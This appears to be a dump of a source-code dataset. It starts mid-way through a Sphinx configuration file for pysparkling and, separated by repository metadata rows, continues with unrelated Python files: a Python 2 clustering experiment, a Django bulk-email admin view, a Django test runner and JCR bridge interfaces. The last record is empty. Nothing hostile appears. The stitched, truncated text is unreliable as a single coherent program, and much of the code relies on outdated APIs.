# The suffix(es) of source filenames.
# You can specify multiple suffix as a list of string:
# source_suffix = ['.rst', '.md']
source_suffix = '.rst'
# The encoding of source files.
#source_encoding = 'utf-8-sig'
# The master toctree document.
master_doc = 'index'
# General information about the project.
project = u'pysparkling'
copyright = u'2015-2016, a project started by Sven Kreiss'
author = u'Sven Kreiss'
# The version info for the project you're documenting, acts as replacement for
# |version| and |release|, also used in various other places throughout the
# built documents.
#
# The short X.Y version.
version = PYSPARKLING_VERSION
# The full version, including alpha/beta/rc tags.
release = PYSPARKLING_VERSION
# The language for content autogenerated by Sphinx. Refer to documentation
# for a list of supported languages.
#
# This is also used if you do content translation via gettext catalogs.
# Usually you set "language" from the command line for these cases.
language = None
# There are two options for replacing |today|: either, you set today to some
# non-false value, then it is used:
#today = ''
# Else, today_fmt is used as the format for a strftime call.
#today_fmt = '%B %d, %Y'
# List of patterns, relative to source directory, that match files and
# directories to ignore when looking for source files.
exclude_patterns = ['_build']
# The reST default role (used for this markup: `text`) to use for all
# documents.
#default_role = None
# If true, '()' will be appended to :func: etc. cross-reference text.
add_function_parentheses = True
# If true, the current module name will be prepended to all description
# unit titles (such as .. function::).
#add_module_names = True
# If true, sectionauthor and moduleauthor directives will be shown in the
# output. They are ignored by default.
#show_authors = False
# The name of the Pygments (syntax highlighting) style to use.
pygments_style = 'sphinx'
# A list of ignored prefixes for module index sorting.
#modindex_common_prefix = []
# If true, keep warnings as "system message" paragraphs in the built documents.
#keep_warnings = False
# If true, `todo` and `todoList` produce output, else they produce nothing.
todo_include_todos = True
# -- Options for HTML output ----------------------------------------------
# The theme to use for HTML and HTML Help pages. See the documentation for
# a list of builtin themes.
# html_theme = 'alabaster'
html_theme = "sphinx_rtd_theme"
# Theme options are theme-specific and customize the look and feel of a theme
# further. For a list of options available for each theme, see the
# documentation.
#html_theme_options = {}
# Add any paths that contain custom themes here, relative to this directory.
#html_theme_path = []
html_theme_path = [sphinx_rtd_theme.get_html_theme_path()]
# The name for this set of Sphinx documents. If None, it defaults to
# "<project> v<release> documentation".
#html_title = None
# A shorter title for the navigation bar. Default is the same as html_title.
#html_short_title = None
# The name of an image file (relative to this directory) to place at the top
# of the sidebar.
# html_logo = 'images/logo-w600.png'
# The name of an image file (within the static path) to use as favicon of the
# docs. This file should be a Windows icon file (.ico) being 16x16 or 32x32
# pixels large.
html_favicon = 'images/favicon.ico'
# Add any paths that contain custom static files (such as style sheets) here,
# relative to this directory. They are copied after the builtin static files,
# so a file named "default.css" will overwrite the builtin "default.css".
html_static_path = ['_static']
# Add any extra paths that contain custom files (such as robots.txt or
# .htaccess) here, relative to this directory. These files are copied
# directly to the root of the documentation.
#html_extra_path = []
# If not '', a 'Last updated on:' timestamp is inserted at every page bottom,
# using the given strftime format.
#html_last_updated_fmt = '%b %d, %Y'
# If true, SmartyPants will be used to convert quotes and dashes to
# typographically correct entities.
#html_use_smartypants = True
# Custom sidebar templates, maps document names to template names.
#html_sidebars = {}
# Additional templates that should be rendered to pages, maps page names to
# template names.
#html_additional_pages = {}
# If false, no module index is generated.
#html_domain_indices = True
# If false, no index is generated.
#html_use_index = True
# If true, the index is split into individual pages for each letter.
#html_split_index = False
# If true, links to the reST sources are added to the pages.
html_show_sourcelink = False
# If true, "Created using Sphinx" is shown in the HTML footer. Default is True.
html_show_sphinx = False
# If true, "(C) Copyright ..." is shown in the HTML footer. Default is True.
#html_show_copyright = True
# If true, an OpenSearch description file will be output, and all pages will
# contain a <link> tag referring to it. The value of this option must be the
# base URL from which the finished HTML is served.
#html_use_opensearch = ''
# This is the file name suffix for HTML files (e.g. ".xhtml").
#html_file_suffix = None
# Language to be used for generating the HTML full-text search index.
# Sphinx supports the following languages:
# 'da', 'de', 'en', 'es', 'fi', 'fr', 'hu', 'it', 'ja'
# 'nl', 'no', 'pt', 'ro', 'ru', 'sv', 'tr'
#html_search_language = 'en'
# A dictionary with options for the search language support, empty by default.
# Now only 'ja' uses this config value
#html_search_options = {'type': 'default'}
# The name of a javascript file (relative to the configuration directory) that
# implements a search results scorer. If empty, the default will be used.
#html_search_scorer = 'scorer.js'
# Output file base name for HTML help builder.
htmlhelp_basename = 'pysparklingdoc'
# -- Options for LaTeX output ---------------------------------------------
latex_elements = {
# The paper size ('letterpaper' or 'a4paper').
#'papersize': 'letterpaper',
# The font size ('10pt', '11pt' or '12pt').
#'pointsize': '10pt',
# Additional stuff for the LaTeX preamble.
#'preamble': '',
# Latex figure (float) alignment
#'figure_align': 'htbp',
}
# Grouping the document tree into LaTeX files. List of tuples
# (source start file, target name, title,
# author, documentclass [howto, manual, or own class]).
latex_documents = [
(master_doc, 'pysparkling.tex', u'pysparkling Documentation',
u'Sven Kreiss', 'manual'),
]
# The name of an image file (relative to this directory) to place at the top of
# the title page.
#latex_logo = None
# For "manual" documents, if this is true, then toplevel headings are parts,
# not chapters.
#latex_use_parts = False
# If true, show page references after internal links.
#latex_show_pagerefs = False
# If true, show URL addresses after external links.
#latex_show_urls = False
# Documents to append as an appendix to all manuals.
#latex_appendices = []
# If false, no module index is generated.
#latex_domain_indices = True
# -- Options for manual page output ---------------------------------------
# One entry per manual page. List of tuples
# (source start file, name, description, authors, manual section).
man_pages = [
(master_doc, 'pysparkling', u'pysparkling Documentation',
[author], 1)
]
# If true, show URL addresses after external links.
#man_show_urls = False
# -- Options for Texinfo output -------------------------------------------
# Grouping the document tree into Texinfo files. List of tuples
# (source start file, target name, title, author,
# dir menu entry, description, category)
texinfo_documents = [
(master_doc, 'pysparkling', u'pysparkling Documentation',
author, 'pysparkling', 'One line description of project.',
'Miscellaneous'),
]
# Documents to append as an appendix to all manuals.
#texinfo_appendices = []
# If false, no module index is generated.
#texinfo_domain_indices = True
# How to display URL addresses: 'footnote', 'no', or 'inline'.
#texinfo_show_urls = 'footnote'
# If true, do not generate a @detailmenu in the "Top" node's menu.
#texinfo_no_detailmenu = False
# Example configuration for intersphinx: refer to the Python standard library.
intersphinx_mapping = {'https://docs.python.org/': None}
| [
"[email protected]"
]
| |
df2ff3db7a4108d0c2ebdb1e4027c6e6897ddf3f | 4ddedf2a3829d7cead057da3ed2ffcffc153786e | /6_google_trace/SONIA/testing/feature_encoder/BPNN/cluster/ann/cluster_4.py | f832fe7fc0ffacb1d946f6351bc72a3b4f6f55c4 | [
"MIT"
]
| permissive | thieu1995/machine_learning | b7a854ea03f5559a57cb93bce7bb41178596033d | 40595a003815445a7a9fef7e8925f71d19f8fa30 | refs/heads/master | 2023-03-03T10:54:37.020952 | 2019-09-08T11:42:46 | 2019-09-08T11:42:46 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 12,838 | py | #!/usr/bin/env python2
# -*- coding: utf-8 -*-
"""
Created on Tue Mar 13 15:49:27 2018
@author: thieunv
Cluster --> update 10% of the weight matrix based on c and dist of each hidden unit
Result is worse than cluster 3 (the worst so far)
"""
import tensorflow as tf
import numpy as np
from scipy.spatial import distance
from math import exp, sqrt
import copy
from random import randint
from operator import itemgetter
#import matplotlib
#matplotlib.use('Agg')
import matplotlib.pyplot as plt
from pandas import read_csv
from sklearn.metrics import mean_squared_error, mean_absolute_error
from sklearn import preprocessing
class Model(object):
def __init__(self, dataset_original, list_idx, epoch, batch_size, sliding, learning_rate, positive_number, stimulation_level):
self.dataset_original = dataset_original
self.train_idx = list_idx[0]
self.test_idx = list_idx[1]
self.epoch = epoch
self.batch_size = batch_size
self.sliding = sliding
self.learning_rate = learning_rate
self.positive_number = positive_number
self.stimulation_level = stimulation_level
self.min_max_scaler = preprocessing.MinMaxScaler()
self.standard_scaler = preprocessing.StandardScaler()
def preprocessing_data(self):
train_idx, test_idx, dataset_original, sliding = copy.deepcopy(self.train_idx), copy.deepcopy(self.test_idx), copy.deepcopy(self.dataset_original), copy.deepcopy(self.sliding)
## Get original dataset
dataset_split = dataset_original[:test_idx + sliding]
training_set = dataset_original[0:train_idx+sliding]
testing_set = dataset_original[train_idx+sliding:test_idx+sliding]
training_set_transform = self.min_max_scaler.fit_transform(training_set)
testing_set_transform = self.min_max_scaler.transform(testing_set)
dataset_transform = np.concatenate( (training_set_transform, testing_set_transform), axis=0 )
self.dataset_scale = copy.deepcopy(dataset_transform)
## Handle data with sliding
dataset_sliding = dataset_transform[:len(dataset_transform)-sliding]
for i in range(sliding-1):
dddd = np.array(dataset_transform[i+1: len(dataset_transform)-sliding+i+1])
dataset_sliding = np.concatenate((dataset_sliding, dddd), axis=1)
## Split data to set train and set test
self.X_train, self.y_train = dataset_sliding[0:train_idx], dataset_sliding[sliding:train_idx+sliding, 0:1]
self.X_test = dataset_sliding[train_idx:test_idx-sliding]
self.y_test = dataset_split[train_idx+sliding:test_idx]
print("Processing data done!!!")
def preprocessing_data_2(self):
train_idx, test_idx, dataset_original, sliding = copy.deepcopy(self.train_idx), copy.deepcopy(self.test_idx), copy.deepcopy(self.dataset_original), copy.deepcopy(self.sliding)
## Transform all dataset
dataset_split = dataset_original[:test_idx + sliding]
dataset_transform = self.min_max_scaler.fit_transform(dataset_split)
self.dataset_scale_2 = copy.deepcopy(dataset_transform)
## Handle data with sliding
dataset_sliding = dataset_transform[:len(dataset_transform)-sliding]
for i in range(sliding-1):
dddd = np.array(dataset_transform[i+1: len(dataset_transform)-sliding+i+1])
dataset_sliding = np.concatenate((dataset_sliding, dddd), axis=1)
## Split data to set train and set test
self.X_train_2, self.y_train_2 = dataset_sliding[0:train_idx], dataset_sliding[sliding:train_idx+sliding, 0:1]
self.X_test_2 = dataset_sliding[train_idx:test_idx-sliding]
self.y_test_2 = dataset_split[train_idx+sliding:test_idx]
print("Processing data done!!!")
def encoder_features(self):
train_X = copy.deepcopy(self.X_train)
stimulation_level, positive_number = self.stimulation_level, self.positive_number
        ### Training process that also creates the hidden units (Phase 1 - cluster the data)
        # 2. Initialize the first hidden unit
hu1 = [0, Model.get_random_input_vector(train_X)] # hidden unit 1 (t1, wH)
list_hu = [copy.deepcopy(hu1)] # list hidden units
        matrix_Wih = copy.deepcopy(hu1[1]).reshape(1, hu1[1].shape[0]) # 2-D array
# training_detail_file_name = full_path + 'SL=' + str(stimulation_level) + '_Slid=' + str(sliding) + '_Epoch=' + str(epoch) + '_BS=' + str(batch_size) + '_LR=' + str(learning_rate) + '_PN=' + str(positive_number) + '_CreateHU.txt'
m = 0
while m < len(train_X):
            list_dist_mj = [] # list of dist(mj) values
# number of hidden units
            for j in range(0, len(list_hu)): # j: index of the j-th hidden unit
dist_sum = 0.0
                for i in range(0, len(train_X[0])): # i: index of the i-th input unit
dist_sum += pow(train_X[m][i] - matrix_Wih[j][i], 2.0)
list_dist_mj.append([j, sqrt(dist_sum)])
            list_dist_mj_sorted = sorted(list_dist_mj, key=itemgetter(1)) # sort ascending by distance
            c = list_dist_mj_sorted[0][0] # c: index of the hidden unit with the minimum distance
            distmc = list_dist_mj_sorted[0][1] # distmc: the smallest distance value
if distmc < stimulation_level:
                list_hu[c][0] += 1 # update the c-th hidden unit
neighbourhood_node = 1 + int( 0.9 * len(list_hu) )
for i in range(0, neighbourhood_node ):
c_temp = list_dist_mj_sorted[i][0]
dist_temp = list_dist_mj_sorted[i][1]
hic = exp(- (dist_temp * dist_temp) )
delta = (positive_number * hic) * (train_X[m] - list_hu[c_temp][1])
list_hu[c_temp][1] += delta
matrix_Wih[c_temp] += delta
# Tiep tuc vs cac example khac
m += 1
if m % 100 == 0:
print "distmc = {0}".format(distmc)
print "m = {0}".format(m)
else:
print "Failed !!!. distmc = {0}".format(distmc)
list_hu.append([0, copy.deepcopy(train_X[m]) ])
print "Hidden unit thu: {0} duoc tao ra.".format(len(list_hu))
matrix_Wih = np.append(matrix_Wih, [copy.deepcopy(train_X[m])], axis = 0)
for hu in list_hu:
hu[0] = 0
# then go to step 1
m = 0
### +++
### +++ Get the last matrix weight
self.matrix_Wih = copy.deepcopy(matrix_Wih)
self.list_hu_1 = copy.deepcopy(list_hu)
print("Encoder features done!!!")
def transform_features(self):
temp1 = []
for i in range(0, len(self.X_train)):
Sih = []
for j in range(0, len(self.matrix_Wih)): # (w11, w21) (w12, w22), (w13, w23)
Sih.append(np.tanh( Model.distance_func(self.matrix_Wih[j], self.X_train[i])))
temp1.append(np.array(Sih))
temp2 = []
for i in range(0, len(self.X_test)):
Sih = []
for j in range(0, len(self.matrix_Wih)): # (w11, w21) (w12, w22), (w13, w23)
Sih.append(np.tanh( Model.distance_func(self.matrix_Wih[j], self.X_test[i])))
temp2.append(np.array(Sih))
self.S_train = np.array(temp1)
self.S_test = np.array(temp2)
print("Transform features done!!!")
def draw_loss(self):
plt.figure(1)
plt.plot(range(self.epoch), self.loss_train, label="Loss on training per epoch")
plt.xlabel('Iteration', fontsize=12)
plt.ylabel('Loss', fontsize=12)
def draw_predict(self):
plt.figure(2)
plt.plot(self.y_test_inverse)
plt.plot(self.y_pred_inverse)
plt.title('Model predict')
plt.ylabel('Real value')
plt.xlabel('Point')
plt.legend(['realY... Test Score RMSE= ' + str(self.score_test_RMSE) , 'predictY... Test Score MAE= '+ str(self.score_test_MAE)], loc='upper right')
def draw_data_train(self):
plt.figure(3)
plt.plot(self.X_train[:, 0], self.X_train[:, 1], 'ro')
plt.title('Train Dataset')
plt.ylabel('Real value')
plt.xlabel('Real value')
def draw_data_test(self):
plt.figure(4)
plt.plot(self.X_test[:, 0], self.X_test[:, 1], 'ro')
plt.title('Test Dataset')
plt.ylabel('Real value')
plt.xlabel('Real value')
def draw_center(self):
plt.figure(5)
plt.plot(self.matrix_Wih[:, 0], self.matrix_Wih[:, 1], 'ro')
plt.title('Centers Cluter KMEANS')
plt.ylabel('Real value')
plt.xlabel('Real value')
def draw_dataset(self):
plt.figure(6)
plt.plot(dataset_original, 'ro')
plt.title('Original dataset')
plt.ylabel('Real value')
plt.xlabel('Real value')
def draw_scale_dataset(self):
plt.figure(7)
plt.plot(self.dataset_scale, 'ro')
plt.title('Scale dataset')
plt.ylabel('Real value')
plt.xlabel('Real value')
def draw_scale_dataset_2(self):
plt.figure(8)
plt.plot(self.dataset_scale_2, 'ro')
plt.title('Scale dataset _ 2')
plt.ylabel('Real value')
plt.xlabel('Real value')
def fit(self):
self.preprocessing_data()
self.preprocessing_data_2()
self.encoder_features()
self.transform_features()
self.draw_data_train()
self.draw_data_test()
self.draw_center()
self.draw_dataset()
self.draw_scale_dataset()
self.draw_scale_dataset_2()
@staticmethod
def distance_func(a, b):
return distance.euclidean(a, b)
@staticmethod
def sigmoid_activation(x):
return 1.0 / (1.0 + exp(-x))
@staticmethod
def get_random_input_vector(train_X):
return copy.deepcopy(train_X[randint(0, len(train_X)-1)])
@staticmethod
def get_batch_data_next(trainX, trainY, index, batch_size):
real_index = index*batch_size
if (len(trainX) % batch_size != 0 and index == (len(trainX)/batch_size +1) ):
return (trainX[real_index:], trainY[real_index:])
elif (real_index == len(trainX)):
return ([], [])
else:
return (trainX[real_index: (real_index+batch_size)], trainY[real_index: (real_index+batch_size)])
## Load data frame
#full_path_name="/mnt/volume/ggcluster/spark-2.1.1-bin-hadoop2.7/thieunv/machine_learning/6_google_trace/data/"
#full_path= "/mnt/volume/ggcluster/spark-2.1.1-bin-hadoop2.7/thieunv/machine_learning/6_google_trace/FLNN/results/notDecompose/data10minutes/univariate/cpu/"
file_name = "Fuzzy_data_sampling_617685_metric_10min_datetime_origin.csv"
full_path_name = "/home/thieunv/university/LabThayMinh/code/6_google_trace/data/"
full_path = "/home/thieunv/university/LabThayMinh/code/6_google_trace/tensorflow/testing/"
df = read_csv(full_path_name+ file_name, header=None, index_col=False, usecols=[0], engine='python')
dataset_original = df.values
stimulation_level = [0.25] #[0.10, 0.2, 0.25, 0.50, 1.0, 1.5, 2.0] # [0.20]
positive_numbers = [0.01] #[0.005, 0.01, 0.025, 0.05, 0.1, 0.15, 0.20] # [0.1]
learning_rates = [0.25] #[0.005, 0.01, 0.025, 0.05, 0.10, 0.12, 0.15] # [0.2]
sliding_windows = [2] #[ 2, 3, 5] # [3]
epochs = [2800] #[100, 250, 500, 1000, 1500, 2000] # [500]
batch_sizes = [32] #[8, 16, 32, 64, 128] # [16]
list_num = [(2800, 4170)]
pl1 = 1 # Use to draw figure
#pl2 = 1000
so_vong_lap = 0
for list_idx in list_num:
for sliding in sliding_windows:
for sti_level in stimulation_level:
for epoch in epochs:
for batch_size in batch_sizes:
for learning_rate in learning_rates:
for positive_number in positive_numbers:
febpnn = Model(dataset_original, list_idx, epoch, batch_size, sliding, learning_rate, positive_number, sti_level)
febpnn.fit()
so_vong_lap += 1
if so_vong_lap % 5000 == 0:
print "Vong lap thu : {0}".format(so_vong_lap)
print "Processing DONE !!!"
| [
"[email protected]"
]
| |
c3ab52e0c857c71ffaabff7df542b4872c48dbcf | 87f574548a321a668f325bc3d120a45366b0b76b | /studioadmin/views/email_users.py | 7f409efcb24684c5ca97d5f8c036492e52fb13ac | []
| no_license | judy2k/pipsevents | 1d19fb4c07e4a94d285e6b633e6ae013da0d1efd | 88b6ca7bb64b0bbbbc66d85d2fa9e975b1bd3081 | refs/heads/master | 2021-01-14T11:11:26.616532 | 2016-10-07T20:47:39 | 2016-10-07T20:55:13 | 36,600,721 | 0 | 0 | null | 2015-05-31T11:51:14 | 2015-05-31T11:51:14 | null | UTF-8 | Python | false | false | 11,607 | py | import ast
import logging
from math import ceil
from django.contrib.auth.decorators import login_required
from django.contrib.auth.models import Group, User
from django.contrib import messages
from django.core.urlresolvers import reverse
from django.template.loader import get_template
from django.template.response import TemplateResponse
from django.shortcuts import HttpResponseRedirect, render
from django.utils.safestring import mark_safe
from django.core.mail.message import EmailMultiAlternatives
from booking.models import Event, Booking
from booking.email_helpers import send_support_email
from studioadmin.forms import EmailUsersForm, ChooseUsersFormSet, \
UserFilterForm
from studioadmin.views.helpers import staff_required, url_with_querystring
from activitylog.models import ActivityLog
logger = logging.getLogger(__name__)
@login_required
@staff_required
def choose_users_to_email(request,
template_name='studioadmin/choose_users_form.html'):
userfilterform = UserFilterForm(prefix='filter')
if 'filter' in request.POST:
event_ids = request.POST.getlist('filter-events')
lesson_ids = request.POST.getlist('filter-lessons')
if event_ids == ['']:
if request.session.get('events'):
del request.session['events']
event_ids = []
elif '' in event_ids:
event_ids.remove('')
else:
request.session['events'] = event_ids
if lesson_ids == ['']:
if request.session.get('lessons'):
del request.session['lessons']
lesson_ids = []
elif '' in lesson_ids:
lesson_ids.remove('')
else:
request.session['lessons'] = lesson_ids
if not event_ids and not lesson_ids:
usersformset = ChooseUsersFormSet(
queryset=User.objects.all().order_by('first_name', 'last_name')
)
else:
event_and_lesson_ids = event_ids + lesson_ids
bookings = Booking.objects.filter(event__id__in=event_and_lesson_ids)
user_ids = set([booking.user.id for booking in bookings
if booking.status == 'OPEN'])
usersformset = ChooseUsersFormSet(
queryset=User.objects.filter(id__in=user_ids)
.order_by('first_name', 'last_name')
)
userfilterform = UserFilterForm(
prefix='filter',
initial={'events': event_ids, 'lessons': lesson_ids}
)
elif request.method == 'POST':
userfilterform = UserFilterForm(prefix='filter', data=request.POST)
usersformset = ChooseUsersFormSet(request.POST)
if usersformset.is_valid():
event_ids = request.session.get('events', [])
lesson_ids = request.session.get('lessons', [])
users_to_email = []
for form in usersformset:
# check checkbox value to determine if that user is to be
# emailed; add user_id to list
if form.is_valid():
if form.cleaned_data.get('email_user'):
users_to_email.append(form.instance.id)
request.session['users_to_email'] = users_to_email
return HttpResponseRedirect(url_with_querystring(
reverse('studioadmin:email_users_view'), events=event_ids, lessons=lesson_ids)
)
else:
# for a new GET, remove any event/lesson session data
if request.session.get('events'):
del request.session['events']
if request.session.get('lessons'):
del request.session['lessons']
usersformset = ChooseUsersFormSet(
queryset=User.objects.all().order_by('first_name', 'last_name'),
)
return TemplateResponse(
request, template_name, {
'usersformset': usersformset,
'userfilterform': userfilterform,
'sidenav_selection': 'email_users',
}
)
@login_required
@staff_required
def email_users_view(request, mailing_list=False,
template_name='studioadmin/email_users_form.html'):
if mailing_list:
subscribed, _ = Group.objects.get_or_create(name='subscribed')
users_to_email = subscribed.user_set.all()
else:
users_to_email = User.objects.filter(
id__in=request.session['users_to_email']
)
if request.method == 'POST':
form = EmailUsersForm(request.POST)
test_email = request.POST.get('send_test', False)
if form.is_valid():
subject = '{}{}'.format(
form.cleaned_data['subject'],
' [TEST EMAIL]' if test_email else ''
)
from_address = form.cleaned_data['from_address']
message = form.cleaned_data['message']
cc = form.cleaned_data['cc']
# bcc recipients
email_addresses = [user.email for user in users_to_email]
email_count = len(email_addresses)
number_of_emails = ceil(email_count / 99)
if test_email:
email_lists = [[from_address]]
else:
email_lists = [email_addresses] # will be a list of lists
# split into multiple emails of 99 bcc plus 1 cc
if email_count > 99:
email_lists = [
email_addresses[i : i + 99]
for i in range(0, email_count, 99)
]
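                    # e.g. 250 recipients -> number_of_emails == ceil(250 / 99) == 3,
                    # and the chunks built above are 99, 99 and 52 addresses long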
host = 'http://{}'.format(request.META.get('HTTP_HOST'))
try:
for i, email_list in enumerate(email_lists):
ctx = {
'subject': subject,
'message': message,
'number_of_emails': number_of_emails,
'email_count': email_count,
'is_test': test_email,
'mailing_list': mailing_list,
'host': host,
}
msg = EmailMultiAlternatives(
subject,
get_template(
'studioadmin/email/email_users.txt').render(
ctx
),
bcc=email_list,
cc=[from_address]
if (i == 0 and cc and not test_email) else [],
reply_to=[from_address]
)
msg.attach_alternative(
get_template(
'studioadmin/email/email_users.html').render(
ctx
),
"text/html"
)
msg.send(fail_silently=False)
if not test_email:
ActivityLog.objects.create(
log='{} email with subject "{}" sent to users {} by'
' admin user {}'.format(
'Mailing list' if mailing_list else 'Bulk',
subject, ', '.join(email_list),
request.user.username
)
)
except Exception as e:
# send mail to tech support with Exception
send_support_email(
e, __name__, "Bulk Email to students"
)
ActivityLog.objects.create(
log="Possible error with sending {} email; "
"notification sent to tech support".format(
'mailing list' if mailing_list else 'bulk'
)
)
if not test_email:
ActivityLog.objects.create(
log='{} email error '
'(email subject "{}"), sent by '
                            'admin user {}'.format(
'Mailing list' if mailing_list else 'Bulk',
subject, request.user.username
)
)
if not test_email:
messages.success(
request,
'{} email with subject "{}" has been sent to '
'users'.format(
'Mailing list' if mailing_list else 'Bulk',
subject
)
)
return HttpResponseRedirect(reverse('studioadmin:users'))
else:
messages.success(
request, 'Test email has been sent to {} only. Click '
'"Send Email" below to send this email to '
'users.'.format(
from_address
)
)
# Do this if form not valid OR sending test email
event_ids = request.session.get('events', [])
lesson_ids = request.session.get('lessons', [])
events = Event.objects.filter(id__in=event_ids)
lessons = Event.objects.filter(id__in=lesson_ids)
if form.errors:
totaleventids = event_ids + lesson_ids
totalevents = Event.objects.filter(id__in=totaleventids)
messages.error(
request,
mark_safe(
"Please correct errors in form: {}".format(form.errors)
)
)
form = EmailUsersForm(
initial={
'subject': "; ".join(
(str(event) for event in totalevents)
)
}
)
if test_email:
form = EmailUsersForm(request.POST)
else:
event_ids = ast.literal_eval(request.GET.get('events', '[]'))
events = Event.objects.filter(id__in=event_ids)
lesson_ids = ast.literal_eval(request.GET.get('lessons', '[]'))
lessons = Event.objects.filter(id__in=lesson_ids)
totaleventids = event_ids + lesson_ids
totalevents = Event.objects.filter(id__in=totaleventids)
form = EmailUsersForm(
initial={
'subject': "; ".join((str(event) for event in totalevents))
}
)
return TemplateResponse(
request, template_name, {
'form': form,
'users_to_email': users_to_email,
'sidenav_selection': 'mailing_list'
if mailing_list else 'email_users',
'events': events,
'lessons': lessons,
'mailing_list': mailing_list
}
)
| [
"[email protected]"
]
| |
33516c24ec951e32d2454058cccb932ff632af1d | 9855a6472fa9cd0a0ed75d5d1110eb5450e38c35 | /django_mailbox/runtests.py | f5b0ff3b0c41ddd22e10232d108f622b41e04984 | []
| no_license | JessAtBlocBoxCo/blocbox | efef025333b689e4c9e0fb6a7bfb2237fcdc72a0 | 0966fd0ba096b2107bd6bd05e08c43b4902e6ff2 | refs/heads/master | 2020-04-11T04:30:25.792700 | 2015-09-22T04:41:34 | 2015-09-22T04:41:34 | 23,008,502 | 2 | 0 | null | null | null | null | UTF-8 | Python | false | false | 1,117 | py | #!/usr/bin/env python
import sys
from os.path import dirname, abspath
try:
from django import setup
except ImportError:
pass
from django.conf import settings
if not settings.configured:
settings.configure(
DATABASES={
'default': {
'ENGINE': 'django.db.backends.sqlite3',
},
},
INSTALLED_APPS=[
'django.contrib.auth',
'django.contrib.contenttypes',
'django_mailbox',
]
)
from django.test.simple import DjangoTestSuiteRunner
def runtests(*test_args):
if not test_args:
test_args = ['django_mailbox']
parent = dirname(abspath(__file__))
sys.path.insert(0, parent)
try:
# ensure that AppRegistry has loaded
setup()
except NameError:
# This version of Django is too old for an app registry.
pass
runner = DjangoTestSuiteRunner(
verbosity=1,
interactive=False,
failfast=False
)
failures = runner.run_tests(test_args)
sys.exit(failures)
if __name__ == '__main__':
runtests(*sys.argv[1:])
| [
"[email protected]"
]
| |
15a59428a27529aafc46c577811104b43b63a731 | 460027c62df6a6939c342d2d2f49a727c8fc955c | /src/nuxeo/jcr/interfaces.py | 0cd0ba5c447f9981fb9a2c9e36f5c777740674bf | []
| no_license | nuxeo-cps/zope3--nuxeo.jcr | ef6d52272835fa14375308bf5a51dbee68b2252a | 88e83d30232226ad71b6f24a2c00e5ad9ba5e603 | refs/heads/main | 2023-01-23T19:56:27.515465 | 2006-10-20T16:54:01 | 2006-10-20T16:54:01 | 317,994,526 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 4,597 | py | ##############################################################################
#
# Copyright (c) 2006 Nuxeo and Contributors.
# All Rights Reserved.
#
# This software is subject to the provisions of the Zope Public License,
# Version 2.1 (ZPL). A copy of the ZPL should accompany this distribution.
# THIS SOFTWARE IS PROVIDED "AS IS" AND ANY AND ALL EXPRESS OR IMPLIED
# WARRANTIES ARE DISCLAIMED, INCLUDING, BUT NOT LIMITED TO, THE IMPLIED
# WARRANTIES OF TITLE, MERCHANTABILITY, AGAINST INFRINGEMENT, AND FITNESS
# FOR A PARTICULAR PURPOSE.
#
##############################################################################
# Author: Florent Guillaume <[email protected]>
# $Id$
"""Capsule JCR interfaces.
"""
from zope.interface import Interface
from ZODB.POSException import ConflictError # for reimport
class ProtocolError(ValueError):
pass
class IJCRController(Interface):
"""Commands between Zope and the JCR bridge.
All commands are synchronous.
The commands may also return JCR events, if some have been sent.
They are accumulated and can be read by ``getPendingEvents()``.
"""
def connect():
"""Connect the controller to the server.
"""
def login(workspaceName):
"""Login to a given workspace.
This is the first command sent. It creates a session on the
JCR side and puts it into a transaction.
Returns the root node UUID.
"""
def prepare():
"""Prepare the current transaction for commit.
May raise a ConflictError.
"""
def commit():
"""Commit the prepared transaction, start a new one.
"""
def abort():
"""Abort the current transaction, start a new one.
"""
def checkpoint(uuid):
"""Checkpoint: checkin and checkout
"""
def restore(uuid, versionName=''):
"""Restore a node.
Return list of uuids to deactivate.
"""
def getNodeTypeDefs():
"""Get the schemas of the node type definitions.
Returns a string containing a set of CND declarations.
System types may be omitted.
"""
def getNodeType(uuid):
"""Get the type of a node.
"""
def getNodeStates(uuids):
"""Get the state of several nodes.
Additional node states may be returned, to improve network
transfers.
Returns a mapping of UUID to a tuple (`name`, `parent_uuid`,
`children`, `properties`, `deferred`).
- `name` is the name of the node,
- `parent_uuid` is the UUID of the node's parent, or None if
it's the root,
- `children` is a sequence of tuples representing children
nodes, usually (`name`, `uuid`, `type`), but for a child with
same-name siblings, (`name`, [`uuid`s], `type`),
- `properties` is a sequence of (`name`, `value`),
- `deferred` is a sequence of `name` of the remaining deferred
properties.
An error is returned if there's no such UUID.
"""
def getNodeProperties(uuid, names):
"""Get the value of selected properties.
Returns a mapping of property name to value.
An error is returned if the UUID doesn't exist or if one of the
names doesn't exist as a property.
"""
def sendCommands(commands):
"""Send a sequence of modification commands to the JCR.
`commands` is an iterable returning tuples of the form:
- 'add', parent_uuid, name, node_type, props_mapping, token
- 'modify', uuid, props_mapping
- 'remove', uuid
- 'order' XXX
A JCR save() is done after the commands have been sent.
Returns a mapping of token -> uuid, which gives the new UUIDs
for created nodes.
"""
def getPendingEvents():
"""Get pending events.
The pending events are sent asynchronously by the server and
accumulated until read by this method.
"""
def getPath(uuid):
"""Get the path of a given UUID.
Returns the path or None.
The path is relative to the JCR workspace root.
"""
def searchProperty(prop_name, value):
"""Search the JCR for nodes where prop_name = 'value'.
Returns a sequence of (uuid, path).
The paths are relative to the JCR workspace root.
"""
def move(uuid, dest_uuid, name):
"""Move the document to another container.
"""
def copy(uuid, dest_uuid, name):
"""Copy the document to another container.
"""
| [
"devnull@localhost"
]
| devnull@localhost |
3aaf3331c8160b13805128f0a48758614d163f12 | e5f7d7706062b7807daafaf5b670d9f273440286 | /stocks/admin.py | 3da94a24279993788e7694d3af8b4fe75814404d | []
| no_license | fchampalimaud/flydb | bd01839c163aa34277091f454f8ad38e3fd45dc4 | 2d3ad9ff5903a26070258f707228334cd765a647 | refs/heads/master | 2021-06-17T15:38:25.517946 | 2018-01-17T16:16:00 | 2018-01-17T16:16:00 | 185,334,467 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 206 | py | from pathlib import Path
from django.contrib import admin
from django.apps import apps
app = apps.get_app_config(Path(__file__).parent.name)
for model in app.get_models():
admin.site.register(model)
| [
"[email protected]"
]
| |
74f037f36854ed429ba78246687bfa075c1ec9b2 | 15f321878face2af9317363c5f6de1e5ddd9b749 | /solutions_python/Problem_206/689.py | ade9216b11543d12d4e0795d77c30c952d9e8947 | []
